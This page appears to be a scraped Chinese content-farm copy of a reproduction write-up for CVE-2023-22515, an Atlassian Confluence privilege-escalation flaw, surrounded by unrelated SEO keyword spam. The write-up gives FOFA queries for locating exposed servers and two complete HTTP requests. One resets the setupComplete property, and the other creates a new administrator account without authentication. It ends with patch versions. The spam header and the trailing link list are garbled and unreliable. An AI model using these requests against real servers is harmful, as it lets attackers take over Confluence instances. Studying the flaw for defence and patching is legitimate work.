当前位置: 首页 > news >正文

冠县网站设计光明新区做网站

冠县网站设计,光明新区做网站,网站建设询价报告,网站更新问题文章目录 Atlassian Confluence权限提升(CVE-2023-22515)漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 Atlassian Confluence权限提升(CVE-2023-22515)漏洞复现 [附POC] 0x01 前言 免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用 0x02 漏洞描述 Confluence是一个专业的企业知识管理与协同软件也可以用于构建企业wiki。使用简单它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论信息推送。 Atlassian Confluence Data Center 和 Confluence Server 存在权限提升漏洞该漏洞由属性覆盖导致未经身份验证的远程攻击者可以重新执行 Confluence 安装流程并增加管理员账户从而访问 Confluence 实例。 0x03 影响版本 Confluence Data Center、Confluence Server 8.0.4 Confluence Data Center、Confluence Server 8.1.4 Confluence Data Center、Confluence Server 8.2.3 Confluence Data Center、Confluence Server 8.3.2 Confluence Data Center、Confluence Server 8.4.2 Confluence Data Center、Confluence Server 8.5.10x04 漏洞环境 FOFA语法app“ATLASSIAN-Confluence” 根据版本精确查询 bodyspan idfooter-build-information8.0.0/span0x05 漏洞复现 1.访问漏洞环境 2.构造POC POC1GET 覆盖 Confluence 服务器 bootstrapStatusProvider.applicationConfig.setupComplete 属性 GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupCompletefalse HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: / Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: closePOC2POST 开始新建管理员账户请求头添加X-Atlassian-Token: no-check POST /setup/setupadministrator.action HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: / Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded X-Atlassian-Token: no-check Content-Length: 107usernamecsfullNamecsemailyj%40yjtest.compasswordcstestconfirmcstestsetup-next-buttonNext3.复现 1.覆盖 Confluence 服务器 bootstrapStatusProvider.applicationConfig.setupComplete 属性出现以下截图属性覆盖成功。 2.开始新建管理员账户请求头添加X-Atlassian-Token: no-check 出现以下截图则添加成功。 3.直接用添加成功的账号密码登录 重新访问登录主页点击statr 使用新建的用户名以及密码登录成功登录。 0x06 修复建议 更新 Confluence Data Center、Confluence Server 至安全版本 https://www.atlassian.com/software/confluence/download-archives安全版本 Confluence Data Center、Confluence Server 8.3.3 Confluence Data Center、Confluence Server 8.4.3 Confluence Data Center、Confluence Server 8.5.2
http://www.yutouwan.com/news/195395/

相关文章:

  • 找人做设计的网站国内营销策划咨询公司
  • 网站的备案编号wordpress设置网址导航
  • 广西网站建设seo优化亚马逊查关键词排名工具
  • 域名通过了才可以做网站吗seo网络推广是干嘛的
  • 营销网站设计与规划方案乐安网站建设
  • 网站制作需要什么软件有哪些某物流网站后台源码
  • 防腐木用什么名字做网站湖南网站设计制作
  • 网站制作报价如何用wordpress建站
  • 家电企业网站模板广东购物网站建设哪家好
  • 苏州市智信建设职业培训学校网站下载百度
  • 怎么用动图做网站背景别人的域名解析到了我的网站上
  • 鄂城网站建设网站建设需求分析酒类
  • 餐饮行业网站建设风格遵义市和城乡建设局网站
  • 网站开发人员职位描述国外低代码平台
  • 青岛网站建设及app嵌入式软件工程师培训
  • 前程无忧做一年网站多钱网站建设的栏目内容
  • 网站建设的基本流程和技术规范住房和城乡建设部政务服务门户查看电子证照
  • 重视机关网站建设制作杂志wordpress主题
  • 怎么做网站登录界面闵行 网站建设公司
  • 定制网站开发公司生物医药网页版传奇推荐
  • 网站做的好坏主要看ps软件破解版
  • 网站建设哪个公司比较好免费领取一个微信号
  • 密云富阳网站建设国外大型门户网站
  • 福州做网站外包国内优秀网站案例
  • 宝安网站建设定制百度一下官方网址
  • 拼车平台网站开发wordpress 登录后台
  • 公司网站建appdiscuz 网站备案信息代码
  • 合肥建设银行官网招聘网站鞍山做网站的公司
  • 正规网站开发文案建设部投诉网站
  • 网站开发费用成本表广东模板网站建设